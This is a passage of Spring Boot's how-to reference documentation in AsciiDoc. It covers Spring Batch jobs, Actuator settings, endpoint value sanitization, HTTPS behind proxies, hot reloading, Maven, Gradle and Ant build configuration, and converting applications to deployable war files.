listenerFactory =\n\t\t\t\tnew DefaultJmsListenerContainerFactory();\n\t\tconfigurer.configure(listenerFactory, connectionFactory);\n\t\tlistenerFactory.setTransactionManager(null);\n\t\tlistenerFactory.setSessionTransacted(false);\n\t\treturn listenerFactory;\n\t}\n----\n\nThe preceding example overrides the default factory, and it should be applied to any\nother factory that your application defines, if any.\n\n\n\n[[howto-batch-applications]]\n== Batch Applications\n\nThis section answers questions that arise from using Spring Batch with Spring Boot.\n\nNOTE: By default, batch applications require a `DataSource` to store job details. If you\nwant to deviate from that, you need to implement `BatchConfigurer`. See\n{spring-batch-javadoc}\/core\/configuration\/annotation\/EnableBatchProcessing.html[The\nJavadoc of `@EnableBatchProcessing`] for more details.\n\nFor more about Spring Batch, see the https:\/\/projects.spring.io\/spring-batch\/[Spring Batch\nproject page].\n\n\n\n[[howto-execute-spring-batch-jobs-on-startup]]\n=== Execute Spring Batch Jobs on Startup\nSpring Batch auto-configuration is enabled by adding `@EnableBatchProcessing`\n(from Spring Batch) somewhere in your context.\n\nBy default, it executes *all* `Jobs` in the application context on startup (see\n{sc-spring-boot-autoconfigure}\/batch\/JobLauncherCommandLineRunner.{sc-ext}[JobLauncherCommandLineRunner]\nfor details). You can narrow down to a specific job or jobs by specifying\n`spring.batch.job.names` (which takes a comma-separated list of job name patterns).\n\n[TIP]\n.Specifying job parameters on the command line\n====\nUnlike command line option arguments that\n<<spring-boot-features.adoc#boot-features-external-config-command-line-args,set properties\nin the `Environment`>> (i.e. by starting with `--`, such as\n`--my-property=value`), job parameters have to be specified on the command line without\ndashes (e.g. `jobParam=value`).\n====\n\nIf the application context includes a `JobRegistry`, the jobs in\n`spring.batch.job.names` are looked up in the registry instead of being autowired from the\ncontext. This is a common pattern with more complex systems, where multiple jobs are\ndefined in child contexts and registered centrally.\n\nSee\n{sc-spring-boot-autoconfigure}\/batch\/BatchAutoConfiguration.{sc-ext}[BatchAutoConfiguration]\nand\nhttps:\/\/github.com\/spring-projects\/spring-batch\/blob\/master\/spring-batch-core\/src\/main\/java\/org\/springframework\/batch\/core\/configuration\/annotation\/EnableBatchProcessing.java[@EnableBatchProcessing]\nfor more details.\n\n\n\n[[howto-actuator]]\n== Actuator\n\nSpring Boot includes the Spring Boot Actuator. This section answers questions that often\narise from its use.\n\n[[howto-change-the-http-port-or-address-of-the-actuator-endpoints]]\n=== Change the HTTP Port or Address of the Actuator Endpoints\nIn a standalone application, the Actuator HTTP port defaults to the same as the main HTTP\nport. To make the application listen on a different port, set the external property:\n`management.server.port`. To listen on a completely different network address (such as\nwhen you have an internal network for management and an external one for user\napplications), you can also set `management.server.address` to a valid IP address to which\nthe server is able to bind.\n\nFor more detail, see the\n{sc-spring-boot-actuator-autoconfigure}\/web\/server\/ManagementServerProperties.{sc-ext}[`ManagementServerProperties`]\nsource code and\n\"`<<production-ready-features.adoc#production-ready-customizing-management-server-port>>`\"\nin the \"`Production-ready features`\" section.\n\n\n\n[[howto-customize-the-whitelabel-error-page]]\n=== Customize the '`whitelabel`' Error Page\nSpring Boot installs a '`whitelabel`' error page that you see in a browser client if\nyou encounter a server error (machine clients consuming JSON and other media types should\nsee a sensible response with the right error code).\n\nNOTE: Set `server.error.whitelabel.enabled=false` to switch the default error page off.\nDoing so restores the default of the servlet container that you are using. Note that\nSpring Boot still tries to resolve the error view, so you should probably add your own\nerror page rather than disabling it completely.\n\nOverriding the error page with your own depends on the templating technology that you\nuse. For example, if you use Thymeleaf, you can add an `error.html` template.\nIf you use FreeMarker, you can add an `error.ftl` template. In general, you\nneed a `View` that resolves with a name of `error` or a `@Controller` that handles\nthe `\/error` path. Unless you replaced some of the default configuration, you should find\na `BeanNameViewResolver` in your `ApplicationContext`, so a `@Bean` named `error` would\nbe a simple way of doing that. See\n{sc-spring-boot-autoconfigure}\/web\/servlet\/error\/ErrorMvcAutoConfiguration.{sc-ext}[`ErrorMvcAutoConfiguration`]\nfor more options.\n\nSee also the section on \"`<<boot-features-error-handling, Error Handling>>`\" for details\nof how to register handlers in the servlet container.\n\n\n\n[[howto-sanitize-sensible-values]]\n=== Sanitize sensible values\nInformation returned by the `env` and `configprops` endpoints can be somewhat sensitive\nso keys matching a certain pattern are sanitized by default (i.e. their values are\nreplaced by `+******+`).\n\nSpring Boot uses sensible defaults for such keys: for instance, any key ending with the\nword \"password\", \"secret\", \"key\" or \"token\" is sanitized. It is also possible to use a\nregular expression instead, such as `+*credentials.*+` to sanitize any key that holds the\nword `credentials` as part of the key.\n\nThe patterns to use can be customized using the `management.endpoint.env.keys-to-sanitize`\nand `management.endpoint.configprops.keys-to-sanitize` respectively.\n\n\n\n[[howto-security]]\n== Security\n\nThis section addresses questions about security when working with Spring Boot, including\nquestions that arise from using Spring Security with Spring Boot.\n\nFor more about Spring Security, see the {spring-security}[Spring Security project page].\n\n\n\n[[howto-switch-off-spring-boot-security-configuration]]\n=== Switch off the Spring Boot Security Configuration\nIf you define a `@Configuration` with a `WebSecurityConfigurerAdapter` in your application,\nit switches off the default webapp security settings in Spring Boot.\n\n\n[[howto-change-the-user-details-service-and-add-user-accounts]]\n=== Change the UserDetailsService and Add User Accounts\nIf you provide a `@Bean` of type `AuthenticationManager`, `AuthenticationProvider`,\nor `UserDetailsService`, the default `@Bean` for `InMemoryUserDetailsManager` is not\ncreated, so you have the full feature set of Spring Security available (such as\nhttps:\/\/docs.spring.io\/spring-security\/site\/docs\/current\/reference\/htmlsingle\/#jc-authentication[various\nauthentication options]).\n\nThe easiest way to add user accounts is to provide your own `UserDetailsService` bean.\n\n\n\n[[howto-enable-https]]\n=== Enable HTTPS When Running behind a Proxy Server\nEnsuring that all your main endpoints are only available over HTTPS is an important\nchore for any application. If you use Tomcat as a servlet container, then\nSpring Boot adds Tomcat's own `RemoteIpValve` automatically if it detects some\nenvironment settings, and you should be able to rely on the `HttpServletRequest` to\nreport whether it is secure or not (even downstream of a proxy server that handles the\nreal SSL termination). The standard behavior is determined by the presence or absence of\ncertain request headers (`x-forwarded-for` and `x-forwarded-proto`), whose names are\nconventional, so it should work with most front-end proxies. You can switch on the valve\nby adding some entries to `application.properties`, as shown in the following example:\n\n[source,properties,indent=0]\n----\n\tserver.tomcat.remote-ip-header=x-forwarded-for\n\tserver.tomcat.protocol-header=x-forwarded-proto\n----\n\n(The presence of either of those properties switches on the valve. Alternatively, you can\nadd the `RemoteIpValve` by adding a `TomcatServletWebServerFactory` bean.)\n\nTo configure Spring Security to require a secure channel for all (or some)\nrequests, consider adding your own `WebSecurityConfigurerAdapter` that adds the following\n`HttpSecurity` configuration:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Configuration\n\tpublic class SslWebSecurityConfigurerAdapter extends WebSecurityConfigurerAdapter {\n\n\t\t@Override\n\t\tprotected void configure(HttpSecurity http) throws Exception {\n\t\t\t\/\/ Customize the application security\n\t\t\thttp.requiresChannel().anyRequest().requiresSecure();\n\t\t}\n\n\t}\n----\n\n\n[[howto-hotswapping]]\n== Hot Swapping\n\nSpring Boot supports hot swapping. This section answers questions about how it works.\n\n\n\n[[howto-reload-static-content]]\n=== Reload Static Content\nThere are several options for hot reloading. The recommended approach is to use\n<<using-spring-boot.adoc#using-boot-devtools,`spring-boot-devtools`>>, as it provides\nadditional development-time features, such as support for fast application restarts\nand LiveReload as well as sensible development-time configuration (such as template\ncaching). Devtools works by monitoring the classpath for changes. This means that static\nresource changes must be \"built\" for the change to take effect. By default, this happens\nautomatically in Eclipse when you save your changes. In IntelliJ IDEA, the Make Project\ncommand triggers the necessary build. Due to the\n<<using-spring-boot.adoc#using-boot-devtools-restart-exclude, default restart\nexclusions>>, changes to static resources do not trigger a restart of your application.\nThey do, however, trigger a live reload.\n\nAlternatively, running in an IDE (especially with debugging on) is a good way to do\ndevelopment (all modern IDEs allow reloading of static resources and usually also allow\nhot-swapping of Java class changes).\n\nFinally, the <<build-tool-plugins.adoc#build-tool-plugins, Maven and Gradle plugins>> can\nbe configured (see the `addResources` property) to support running from the command line\nwith reloading of static files directly from source. You can use that with an external\ncss\/js compiler process if you are writing that code with higher-level tools.\n\n\n\n[[howto-reload-thymeleaf-template-content]]\n=== Reload Templates without Restarting the Container\nMost of the templating technologies supported by Spring Boot include a configuration\noption to disable caching (described later in this document). If you use the\n`spring-boot-devtools` module, these properties are\n<<using-spring-boot.adoc#using-boot-devtools-property-defaults,automatically configured>>\nfor you at development time.\n\n\n\n[[howto-reload-thymeleaf-content]]\n==== Thymeleaf Templates\nIf you use Thymeleaf, set `spring.thymeleaf.cache` to `false`. See\n{sc-spring-boot-autoconfigure}\/thymeleaf\/ThymeleafAutoConfiguration.{sc-ext}[`ThymeleafAutoConfiguration`]\nfor other Thymeleaf customization options.\n\n\n\n[[howto-reload-freemarker-content]]\n==== FreeMarker Templates\nIf you use FreeMarker, set `spring.freemarker.cache` to `false`. See\n{sc-spring-boot-autoconfigure}\/freemarker\/FreeMarkerAutoConfiguration.{sc-ext}[`FreeMarkerAutoConfiguration`]\nfor other FreeMarker customization options.\n\n\n\n[[howto-reload-groovy-template-content]]\n==== Groovy Templates\nIf you use Groovy templates, set `spring.groovy.template.cache` to `false`. See\n{sc-spring-boot-autoconfigure}\/groovy\/template\/GroovyTemplateAutoConfiguration.{sc-ext}[`GroovyTemplateAutoConfiguration`]\nfor other Groovy customization options.\n\n\n\n[[howto-reload-fast-restart]]\n=== Fast Application Restarts\nThe `spring-boot-devtools` module includes support for automatic application restarts.\nWhile not as fast as technologies such as\nhttps:\/\/zeroturnaround.com\/software\/jrebel\/[JRebel] it is usually significantly faster than\na \"`cold start`\". You should probably give it a try before investigating some of the more\ncomplex reload options discussed later in this document.\n\nFor more details, see the <<using-spring-boot.adoc#using-boot-devtools>> section.\n\n\n\n[[howto-reload-java-classes-without-restarting]]\n=== Reload Java Classes without Restarting the Container\nMany modern IDEs (Eclipse, IDEA, and others) support hot swapping of bytecode.\nConsequently, if you make a change that does not affect class or method signatures, it\nshould reload cleanly with no side effects.\n\n\n\n[[howto-build]]\n== Build\n\nSpring Boot includes build plugins for Maven and Gradle. This section answers common\nquestions about these plugins.\n\n\n\n[[howto-build-info]]\n=== Generate Build Information\nBoth the Maven plugin and the Gradle plugin allow generating build information containing\nthe coordinates, name, and version of the project. The plugins can also be configured\nto add additional properties through configuration. When such a file is present,\nSpring Boot auto-configures a `BuildProperties` bean.\n\nTo generate build information with Maven, add an execution for the `build-info` goal, as\nshown in the following example:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<version>{spring-boot-version}<\/version>\n\t\t\t\t<executions>\n\t\t\t\t\t<execution>\n\t\t\t\t\t\t<goals>\n\t\t\t\t\t\t\t<goal>build-info<\/goal>\n\t\t\t\t\t\t<\/goals>\n\t\t\t\t\t<\/execution>\n\t\t\t\t<\/executions>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nTIP: See the {spring-boot-maven-plugin-site}[Spring Boot Maven Plugin documentation]\nfor more details.\n\nThe following example does the same with Gradle:\n\n[source,groovy,indent=0,subs=\"verbatim,attributes\"]\n----\n\tspringBoot {\n\t\tbuildInfo()\n\t}\n----\n\nTIP: See the\n{spring-boot-gradle-plugin-reference}\/#integrating-with-actuator-build-info[Spring Boot\nGradle Plugin documentation] for more details.\n\n\n\n[[howto-git-info]]\n=== Generate Git Information\n\nBoth Maven and Gradle allow generating a `git.properties` file containing information\nabout the state of your `git` source code repository when the project was built.\n\nFor Maven users, the `spring-boot-starter-parent` POM includes a pre-configured plugin to\ngenerate a `git.properties` file. To use it, add the following declaration to your POM:\n\n[source,xml,indent=0]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>pl.project13.maven<\/groupId>\n\t\t\t\t<artifactId>git-commit-id-plugin<\/artifactId>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nGradle users can achieve the same result by using the\nhttps:\/\/plugins.gradle.org\/plugin\/com.gorylenko.gradle-git-properties[`gradle-git-properties`]\nplugin, as shown in the following example:\n\n[source,groovy,indent=0]\n----\n\tplugins {\n\t\tid \"com.gorylenko.gradle-git-properties\" version \"1.5.1\"\n\t}\n----\n\nTIP: The commit time in `git.properties` is expected to match the following format:\n`yyyy-MM-dd'T'HH:mm:ssZ`. This is the default format for both plugins listed above. Using\nthis format lets the time be parsed into a `Date` and its format, when serialized to JSON,\nto be controlled by Jackson's date serialization configuration settings.\n\n\n\n[[howto-customize-dependency-versions]]\n=== Customize Dependency Versions\nIf you use a Maven build that inherits directly or indirectly from\n`spring-boot-dependencies` (for instance, `spring-boot-starter-parent`) but you want to\noverride a specific third-party dependency, you can add appropriate `<properties>`\nelements. Browse the\n{github-code}\/spring-boot-project\/spring-boot-dependencies\/pom.xml[`spring-boot-dependencies`]\nPOM for a complete list of properties. For example, to pick a different `slf4j` version,\nyou would add the following property:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<properties>\n\t\t<slf4j.version>1.7.5<slf4j.version>\n\t<\/properties>\n----\n\nNOTE: Doing so only works if your Maven project inherits (directly or indirectly) from\n`spring-boot-dependencies`. If you have added `spring-boot-dependencies` in your\nown `dependencyManagement` section with `<scope>import<\/scope>`, you have to redefine\nthe artifact yourself instead of overriding the property.\n\nWARNING: Each Spring Boot release is designed and tested against this specific set of\nthird-party dependencies. Overriding versions may cause compatibility issues.\n\nTo override dependency versions in Gradle, see {spring-boot-gradle-plugin-reference}\/#managing-dependencies-customizing[this section]\nof the Gradle plugin's documentation.\n\n[[howto-create-an-executable-jar-with-maven]]\n=== Create an Executable JAR with Maven\nThe `spring-boot-maven-plugin` can be used to create an executable \"`fat`\" JAR. If you\nuse the `spring-boot-starter-parent` POM, you can declare the plugin and your jars are\nrepackaged as follows:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nIf you do not use the parent POM, you can still use the plugin. However, you must\nadditionally add an `<executions>` section, as follows:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<version>{spring-boot-version}<\/version>\n\t\t\t\t<executions>\n\t\t\t\t\t<execution>\n\t\t\t\t\t\t<goals>\n\t\t\t\t\t\t\t<goal>repackage<\/goal>\n\t\t\t\t\t\t<\/goals>\n\t\t\t\t\t<\/execution>\n\t\t\t\t<\/executions>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nSee the {spring-boot-maven-plugin-site}\/usage.html[plugin documentation] for full usage\ndetails.\n\n\n[[howto-create-an-additional-executable-jar]]\n=== Use a Spring Boot Application as a Dependency\nLike a war file, a Spring Boot application is not intended to be used as a dependency. If\nyour application contains classes that you want to share with other projects, the\nrecommended approach is to move that code into a separate module. The separate module can\nthen be depended upon by your application and other projects.\n\nIf you cannot rearrange your code as recommended above, Spring Boot's Maven and Gradle\nplugins must be configured to produce a separate artifact that is suitable for use as a\ndependency. The executable archive cannot be used as a dependency as the\n<<appendix-executable-jar-format.adoc#executable-jar-jar-file-structure,executable jar\nformat>> packages application classes in `BOOT-INF\/classes`. This means\nthat they cannot be found when the executable jar is used as a dependency.\n\nTo produce the two artifacts, one that can be used as a dependency and one that is\nexecutable, a classifier must be specified. This classifier is applied to the name of the\nexecutable archive, leaving the default archive for use as a dependency.\n\nTo configure a classifier of `exec` in Maven, you can use the following configuration:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<configuration>\n\t\t\t\t\t<classifier>exec<\/classifier>\n\t\t\t\t<\/configuration>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\n\n\n[[howto-extract-specific-libraries-when-an-executable-jar-runs]]\n=== Extract Specific Libraries When an Executable Jar Runs\nMost nested libraries in an executable jar do not need to be unpacked in order to run.\nHowever, certain libraries can have problems. For example, JRuby includes its own nested\njar support, which assumes that the `jruby-complete.jar` is always directly available as a\nfile in its own right.\n\nTo deal with any problematic libraries, you can flag that specific nested jars should be\nautomatically unpacked when the executable jar first runs. Such nested jars are written\nbeneath the temporary directory identified by the `java.io.tmpdir` system property.\n\nWARNING: Care should be taken to ensure that your operating system is configured so that\nit will not delete the jars that have been unpacked to the temporary directory while the\napplication is still running.\n\nFor example, to indicate that JRuby should be flagged for unpacking by using the Maven\nPlugin, you would add the following configuration:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<configuration>\n\t\t\t\t\t<requiresUnpack>\n\t\t\t\t\t\t<dependency>\n\t\t\t\t\t\t\t<groupId>org.jruby<\/groupId>\n\t\t\t\t\t\t\t<artifactId>jruby-complete<\/artifactId>\n\t\t\t\t\t\t<\/dependency>\n\t\t\t\t\t<\/requiresUnpack>\n\t\t\t\t<\/configuration>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\n\n\n[[howto-create-a-nonexecutable-jar]]\n=== Create a Non-executable JAR with Exclusions\nOften, if you have an executable and a non-executable jar as two separate build products,\nthe executable version has additional configuration files that are not needed in a library\njar. For example, the `application.yml` configuration file might by excluded from the\nnon-executable JAR.\n\nIn Maven, the executable jar must be the main artifact and you can add a classified jar\nfor the library, as follows:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t<\/plugin>\n\t\t\t<plugin>\n\t\t\t\t<artifactId>maven-jar-plugin<\/artifactId>\n\t\t\t\t<executions>\n\t\t\t\t\t<execution>\n\t\t\t\t\t\t<id>lib<\/id>\n\t\t\t\t\t\t<phase>package<\/phase>\n\t\t\t\t\t\t<goals>\n\t\t\t\t\t\t\t<goal>jar<\/goal>\n\t\t\t\t\t\t<\/goals>\n\t\t\t\t\t\t<configuration>\n\t\t\t\t\t\t\t<classifier>lib<\/classifier>\n\t\t\t\t\t\t\t<excludes>\n\t\t\t\t\t\t\t\t<exclude>application.yml<\/exclude>\n\t\t\t\t\t\t\t<\/excludes>\n\t\t\t\t\t\t<\/configuration>\n\t\t\t\t\t<\/execution>\n\t\t\t\t<\/executions>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\n\n\n[[howto-remote-debug-maven-run]]\n=== Remote Debug a Spring Boot Application Started with Maven\nTo attach a remote debugger to a Spring Boot application that was started with Maven, you\ncan use the `jvmArguments` property of the {spring-boot-maven-plugin-site}[maven plugin].\n\nSee {spring-boot-maven-plugin-site}\/examples\/run-debug.html[this example] for more\ndetails.\n\n\n\n[[howto-build-an-executable-archive-with-ant]]\n=== Build an Executable Archive from Ant without Using `spring-boot-antlib`\nTo build with Ant, you need to grab dependencies, compile, and then create a jar or war\narchive. To make it executable, you can either use the `spring-boot-antlib`\nmodule or you can follow these instructions:\n\n. If you are building a jar, package the application's classes and resources in a nested\n`BOOT-INF\/classes` directory. If you are building a war, package the application's\nclasses in a nested `WEB-INF\/classes` directory as usual.\n. Add the runtime dependencies in a nested `BOOT-INF\/lib` directory for a jar or\n`WEB-INF\/lib` for a war. Remember *not* to compress the entries in the archive.\n. Add the `provided` (embedded container) dependencies in a nested `BOOT-INF\/lib`\ndirectory for a jar or `WEB-INF\/lib-provided` for a war. Remember *not* to compress the\nentries in the archive.\n. Add the `spring-boot-loader` classes at the root of the archive (so that the `Main-Class`\nis available).\n. Use the appropriate launcher (such as `JarLauncher` for a jar file) as a `Main-Class`\nattribute in the manifest and specify the other properties it needs as manifest entries --\nprincipally, by setting a `Start-Class` property.\n\nThe following example shows how to build an executable archive with Ant:\n\n[source,xml,indent=0]\n----\n\t<target name=\"build\" depends=\"compile\">\n\t\t<jar destfile=\"target\/${ant.project.name}-${spring-boot.version}.jar\" compress=\"false\">\n\t\t\t<mappedresources>\n\t\t\t\t<fileset dir=\"target\/classes\" \/>\n\t\t\t\t<globmapper from=\"*\" to=\"BOOT-INF\/classes\/*\"\/>\n\t\t\t<\/mappedresources>\n\t\t\t<mappedresources>\n\t\t\t\t<fileset dir=\"src\/main\/resources\" erroronmissingdir=\"false\"\/>\n\t\t\t\t<globmapper from=\"*\" to=\"BOOT-INF\/classes\/*\"\/>\n\t\t\t<\/mappedresources>\n\t\t\t<mappedresources>\n\t\t\t\t<fileset dir=\"${lib.dir}\/runtime\" \/>\n\t\t\t\t<globmapper from=\"*\" to=\"BOOT-INF\/lib\/*\"\/>\n\t\t\t<\/mappedresources>\n\t\t\t<zipfileset src=\"${lib.dir}\/loader\/spring-boot-loader-jar-${spring-boot.version}.jar\" \/>\n\t\t\t<manifest>\n\t\t\t\t<attribute name=\"Main-Class\" value=\"org.springframework.boot.loader.JarLauncher\" \/>\n\t\t\t\t<attribute name=\"Start-Class\" value=\"${start-class}\" \/>\n\t\t\t<\/manifest>\n\t\t<\/jar>\n\t<\/target>\n----\n\nThe {github-code}\/spring-boot-samples\/spring-boot-sample-ant[Ant Sample] has a\n`build.xml` file with a `manual` task that should work if you run it with the following\ncommand:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t$ ant -lib <folder containing ivy-2.2.jar> clean manual\n----\n\nThen you can run the application with the following command:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t$ java -jar target\/*.jar\n----\n\n\n\n[[howto-traditional-deployment]]\n== Traditional Deployment\n\nSpring Boot supports traditional deployment as well as more modern forms of deployment.\nThis section answers common questions about traditional deployment.\n\n\n\n[[howto-create-a-deployable-war-file]]\n=== Create a Deployable War File\n\nWARNING: Because Spring WebFlux does not strictly depend on the Servlet API and\napplications are deployed by default on an embedded Reactor Netty server,\nWar deployment is not supported for WebFlux applications.\n\nThe first step in producing a deployable war file is to provide a\n`SpringBootServletInitializer` subclass and override its `configure` method. Doing so\nmakes use of Spring Framework's Servlet 3.0 support and lets you configure your\napplication when it is launched by the servlet container. Typically, you should update\nyour application's main class to extend `SpringBootServletInitializer`, as shown in the\nfollowing example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@SpringBootApplication\n\tpublic class Application extends SpringBootServletInitializer {\n\n\t\t@Override\n\t\tprotected SpringApplicationBuilder configure(SpringApplicationBuilder application) {\n\t\t\treturn application.sources(Application.class);\n\t\t}\n\n\t\tpublic static void main(String[] args) {\n\t\t\tSpringApplication.run(Application.class, args);\n\t\t}\n\n\t}\n----\n\nThe next step is to update your build configuration such that your project produces a war\nfile rather than a jar file. If you use Maven and `spring-boot-starter-parent` (which\nconfigures Maven's war plugin for you), all you need to do is to modify `pom.xml` to\nchange the packaging to war, as follows:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<packaging>war<\/packaging>\n----\n\nIf you use Gradle, you need to modify `build.gradle` to apply the war plugin to the\nproject, as follows:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tapply plugin: 'war'\n----\n\nThe final step in the process is to ensure that the embedded servlet container does not\ninterfere with the servlet container to which the war file is deployed. To do so, you\nneed to mark the embedded servlet container dependency as being provided.\n\nIf you use Maven, the following example marks the servlet container (Tomcat, in this\ncase) as being provided:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependencies>\n\t\t<!-- \u2026 -->\n\t\t<dependency>\n\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t<artifactId>spring-boot-starter-tomcat<\/artifactId>\n\t\t\t<scope>provided<\/scope>\n\t\t<\/dependency>\n\t\t<!-- \u2026 -->\n\t<\/dependencies>\n----\n\nIf you use Gradle, the following example marks the servlet container (Tomcat, in this\ncase) as being provided:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tdependencies {\n\t\t\/\/ \u2026\n\t\tprovidedRuntime 'org.springframework.boot:spring-boot-starter-tomcat'\n\t\t\/\/ \u2026\n\t}\n----\n\nTIP: `providedRuntime` is preferred to Gradle's `compileOnly` configuration. Among other\nlimitations, `compileOnly` dependencies are not on the test classpath, so any web-based\nintegration tests fail.\n\nIf you use the <<build-tool-plugins.adoc#build-tool-plugins, Spring Boot build tools>>,\nmarking the embedded servlet container dependency as provided produces an executable war\nfile with the provided dependencies packaged in a `lib-provided` directory. This means\nthat, in addition to being deployable to a servlet container, you can also run your\napplication by using `java -jar` on the command line.\n\nTIP: Take a look at Spring Boot's sample applications for a\n{github-code}\/spring-boot-samples\/spring-boot-sample-traditional\/pom.xml[Maven-based\nexample] of the previously described configuration.\n\n\n\n\n[[howto-convert-an-existing-application-to-spring-boot]]\n=== Convert an Existing Application to Spring Boot\nFor a non-web application, it should be easy to convert an existing Spring application to\na Spring Boot application. To do so, throw away the code that creates your\n`ApplicationContext` and replace it with calls to `SpringApplication` or\n`SpringApplicationBuilder`. Spring MVC web applications are generally amenable to first\ncreating a deployable war application and then migrating it later to an executable war\nor jar. See the https:\/\/spring.io\/guides\/gs\/convert-jar-to-war\/[Getting\nStarted Guide on Converting a jar to a war].\n\nTo create a deployable war by extending `SpringBootServletInitializer` (for example, in a\nclass called `Application`) and adding the Spring Boot `@SpringBootApplication`\nannotation, use code similar to that shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@SpringBootApplication\n\tpublic class Application extends SpringBootServletInitializer {\n\n\t\t@Override\n\t\tprotected SpringApplicationBuilder configure(SpringApplicationBuilder application) {\n\t\t\t\/\/ Customize the application or call application.sources(...) to add sources\n\t\t\t\/\/ Since our example is itself a @Configuration class (via @SpringBootApplication)\n\t\t\t\/\/ we actually don't need to override this method.\n\t\t\treturn application;\n\t\t}\n\n\t}\n----\n\nRemember that, whatever you put in the `sources` is merely a Spring `ApplicationContext`.\nNormally, anything that already works should work here. There might be some beans you can\nremove later and let Spring Boot provide its own defaults for them, but it should be\npossible to get something working before you need to do that.\n\nStatic resources can be moved to `\/public` (or `\/static` or `\/resources` or\n`\/META-INF\/resources`) in the classpath root. The same applies to `messages.properties`\n(which Spring Boot automatically detects in the root of the classpath).\n\nVanilla usage of Spring `DispatcherServlet` and Spring Security should require no further\nchanges. If you have other features in your application (for instance, using other\nservlets or filters), you may need to add some configuration to your `Application`\ncontext, by replacing those elements from the `web.xml`, as follows:\n\n* A `@Bean` of type `Servlet` or `ServletRegistrationBean` installs that bean in the\ncontainer as if it were a `<servlet\/>` and `<servlet-mapping\/>` in `web.xml`.\n* A `@Bean` of type `Filter` or `FilterRegistrationBean` behaves similarly (as a\n`<filter\/>` and `<filter-mapping\/>`).\n* An `ApplicationContext` in an XML file can be added through an `@ImportResource` in\nyour `Application`. Alternatively, simple cases where annotation configuration is\nheavily used already can be recreated in a few lines as `@Bean` definitions.\n\nOnce the war file is working, you can make it executable by adding a `main` method to\nyour `Application`, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tpublic static void main(String[] args) {\n\t\tSpringApplication.run(Application.class, args);\n\t}\n----\n\n[NOTE]\n====\nIf you intend to start your application as a war or as an executable application, you\nneed to share the customizations of the builder in a method that is both available to the\n`SpringBootServletInitializer` callback and in the `main` method in a class similar to the\nfollowing:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@SpringBootApplication\n\tpublic class Application extends SpringBootServletInitializer {\n\n\t\t@Override\n\t\tprotected SpringApplicationBuilder configure(SpringApplicationBuilder builder) {\n\t\t\treturn configureApplication(builder);\n\t\t}\n\n\t\tpublic static void main(String[] args) {\n\t\t\tconfigureApplication(new SpringApplicationBuilder()).run(args);\n\t\t}\n\n\t\tprivate static SpringApplicationBuilder configureApplication(SpringApplicationBuilder builder) {\n\t\t\treturn builder.sources(Application.class).bannerMode(Banner.Mode.OFF);\n\t\t}\n\n\t}\n----\n====\n\nApplications can fall into more than one category:\n\n* Servlet 3.0+ applications with no `web.xml`.\n* Applications with a `web.xml`.\n* Applications with a context hierarchy.\n* Applications without a context hierarchy.\n\nAll of these should be amenable to translation, but each might require slightly different\ntechniques.\n\nServlet 3.0+ applications might translate pretty easily if they already use the Spring\nServlet 3.0+ initializer support classes. Normally, all the code from an existing\n`WebApplicationInitializer` can be moved into a `SpringBootServletInitializer`. If your\nexisting application has more than one `ApplicationContext` (for example, if it uses\n`AbstractDispatcherServletInitializer`) then you might be able to combine all your context\nsources into a single `SpringApplication`. The main complication you might encounter is if\ncombining does not work and you need to maintain the context hierarchy. See the\n<<howto-build-an-application-context-hierarchy, entry on building a hierarchy>> for\nexamples. An existing parent context that contains web-specific features usually\nneeds to be broken up 